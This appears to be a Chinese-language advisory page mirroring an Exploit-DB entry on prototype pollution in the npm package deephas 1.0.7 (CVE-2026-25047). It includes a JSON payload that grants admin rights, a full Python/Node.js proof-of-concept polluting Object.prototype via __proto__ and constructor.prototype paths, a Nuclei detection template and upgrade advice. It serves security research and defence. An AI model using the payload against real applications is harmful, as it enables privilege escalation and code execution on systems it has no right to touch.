[webapps] deephas 1.0.7 - Prototype Pollution
CVE-2026-25047
deephas 1.0.7 存在原型污染漏洞,允许攻击者通过精心构造的输入污染对象原型。
Critical · CVSS 9.8📋 漏洞基础信息
| CVE | CVE-2026-25047 |
|---|---|
| 漏洞类型 | 原型污染 |
| 受影响版本 | deephas 1.0.7 |
| 危害等级 | Critical · CVSS 9.8 |
| 发布日期 | 2026-04-30 |
| 提交者 | Mohammed Idrees Banyamer |
| 来源 | Exploit-DB 原文 ↗ |
🔬 漏洞根因
应用在处理用户输入时未正确限制属性设置操作,允许通过 `__proto__` 或 `constructor.prototype` 等特殊路径修改 Object.prototype 的属性,导致全局对象原型被污染。
🎯 攻击场景
1. 攻击者发送一个包含 `__proto__` 或 `constructor.prototype` 键的 HTTP 请求(例如 JSON 体或查询参数)。 2. 服务器端代码在处理该输入时(如深度合并、赋值或拷贝操作)没有过滤这些特殊键。 3. 攻击者的值被写入 `Object.prototype`,导致所有对象都继承该属性。 4. 后续应用逻辑使用未经验证的对象属性时,可能触发任意代码执行或绕过安全检查。 成功标志:服务器行为异常或执行了攻击者控制的代码。
💥 漏洞影响
攻击者可利用原型污染实现远程代码执行、权限提升、绕过认证、篡改应用逻辑或导致拒绝服务。
⚔️ 原始 PoC
原始 PoC 通过向目标接口发送 JSON 数据 `{"__proto__": {"isAdmin": true}}` 或相似的 payload,导致应用在处理时将 `isAdmin` 属性添加到所有对象原型上,从而使普通用户获得管理员权限。
# Exploit Author: Mohammed Idrees Banyamer
# Instagram: @banyamer_security
# CVSS: 9.8 (Critical)
#
# Description:
# The 'deephas' npm package suffers from a prototype pollution vulnerability
# in versions 1.0.7 and below due to unsafe recursive property assignment
# without proper hasOwnProperty checks and inadequate path sanitization.
#
# An attacker who can supply arbitrary keys to deephas.set() can pollute
# Object.prototype — which may lead to:
# • Remote code execution (when polluting sensible properties like
# process.env, require.extensions, child_process, etc.)
# • Denial of Service
# • Security bypass (when polluting hasOwnProperty, toString, etc.)
# • Privilege escalation in sandboxed / vm2-like environments
#
# This PoC demonstrates pollution of Object.prototype via two techniques:
# 1. constructor.prototype path + hasOwnProperty bypass
# 2. __proto__ path + indexOf bypass
#
# • https://github.com/sharpred/deepHas/security/advisories/GHSA-2733-6c58-pf27
# • https://nvd.nist.gov/vuln/detail/CVE-2026-25047
#
# Usage:
# 1. npm install deephas@1.0.7
# 2. python3 poc-deephas-prototype-pollution.py
#
# Remediation:
# Upgrade to deephas >= 1.0.8
#
import subprocess
import os
import textwrap
import sys
import shutil
def run_js(code: str) -> tuple[bool, str, str]:
"""Execute JavaScript code snippet via Node.js and capture output"""
tmp_file = "poc-deephas-temp.js"
try:
with open(tmp_file, "w", encoding="utf-8") as f:
f.write(code.strip())
result = subprocess.run(
["node", tmp_file],
capture_output=True,
text=True,
timeout=10,
check=False
)
return (
result.returncode == 0,
result.stdout.strip(),
result.stderr.strip()
)
except FileNotFoundError:
return False, "", "Node.js not found. Please install Node.js."
except subprocess.TimeoutExpired:
return False, "", "Execution timed out."
except Exception as e:
return False, "", f"Error: {str(e)}"
finally:
if os.path.exists(tmp_file):
try:
os.remove(tmp_file)
except:
pass
def show_result(name: str, success: bool, stdout: str, stderr: str):
print(f"{'─' * 10} {name} {'─' * 10}")
if not success:
print("STATUS : FAILED")
if stderr:
print("ERROR :", stderr.splitlines()[0] if stderr.splitlines() else stderr)
else:
print("(no error message captured)")
else:
polluted = any(x in stdout.lower() for x in ["yes!!!", "hacked", "polluted"])
status = "VULNERABLE (pollution successful)" if polluted else "UNEXPECTED RESULT"
print(f"STATUS : {status}")
print()
for line in stdout.splitlines():
print(f" {line}")
print("─" * 70)
print()
def main():
print("=" * 70)
print(" deephas <= 1.0.7 – Prototype Pollution PoC")
print(" CVE-2026-25047 / GHSA-2733-6c58-pf27")
print("=" * 70)
print()
if not shutil.which("node"):
print("Error: Node.js is required but not found in PATH.")
sys.exit(1)
print("[*] Make sure you have installed the vulnerable version:")
print(" npm install deephas@1.0.7\n")
# ── PoC 1: constructor.prototype + hasOwnProperty bypass ───────
poc1 = textwrap.dedent("""\
Object.prototype.hasOwnProperty = () => true;
const has = require('deephas');
const obj = {};
has.set(obj, 'constructor.prototype.poc1', 'yes!!!');
console.log('obj.poc1 →', obj.poc1);
console.log('{}.poc1 →', {}.poc1);
console.log('polluted global? →', {}.poc1 === 'yes!!!');
""")
ok1, out1, err1 = run_js(poc1)
show_result("PoC 1 – constructor.prototype pollution", ok1, out1, err1)
# ── PoC 2: __proto__ + indexOf bypass ──────────────────────────
poc2 = textwrap.dedent("""\
String.prototype.indexOf = () => -1;
const has = require('deephas');
const obj = {};
has.set(obj, '__proto__.poc2', 'HACKED');
console.log('obj.poc2 →', obj.poc2);
console.log('{}.poc2 →', {}.poc2);
console.log('polluted global? →', {}.poc2 === 'HACKED');
""")
ok2, out2, err2 = run_js(poc2)
show_result("PoC 2 – __proto__ + indexOf bypass", ok2, out2, err2)
print(" " * 20 + "SUMMARY".center(30, "─"))
print("If you see 'yes!!!' or 'HACKED' printed from {}.xxx property")
print("→ deephas@1.0.7 is VULNERABLE to prototype pollution.")
print()
print("Fix: Upgrade to deephas >= 1.0.8")
print("=" * 70)
if __name__ == "__main__":
main()🔍 Nuclei Detection 模板
以下为漏洞探测模板,用于判断目标是否受影响:
id: CVE-2026-25047-detection
info:
name: deephas 1.0.7 - Prototype Pollution Detection
author: banyamer_security
severity: critical
description: |
The 'deephas' npm package suffers from a prototype pollution vulnerability
in versions 1.0.7 and below due to unsafe recursive property assignment
without proper hasOwnProperty checks and inadequate path sanitization.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2026-25047
- https://github.com/sharpred/deepHas/security/advisories/GHSA-2733-6c58-pf27
classification:
cvss-score: 9.8
tags: cve,cve2026,prototype-pollution,deephas,nodejs
http:
- method: GET
path:
- "{{BaseURL}}/package.json"
- "{{BaseURL}}/node_modules/deephas/package.json"
stop-at-first-match: true
matchers-condition: or
matchers:
- type: word
words:
- '"deephas"'
condition: and
- type: regex
regex:
- '"version":\s*"1\.0\.([0-7])"'
condition: and
extractors:
- type: regex
name: version
regex:
- '"version":\s*"([^"]+)"'
group: 1🛡️ 修复建议
升级到 deephas 高于 1.0.7 的修复版本;临时措施:在代码中严格过滤用户输入中的 `__proto__`、`constructor`、`prototype` 等键,或使用安全的深度合并函数(如 lodash.merge 的防御版)。
📎 参考链接
⚠️ 本文基于公开漏洞数据库,仅供安全研究与防御参考。生成时间: 2026-05-07 05:29 | 来源: Exploit-DB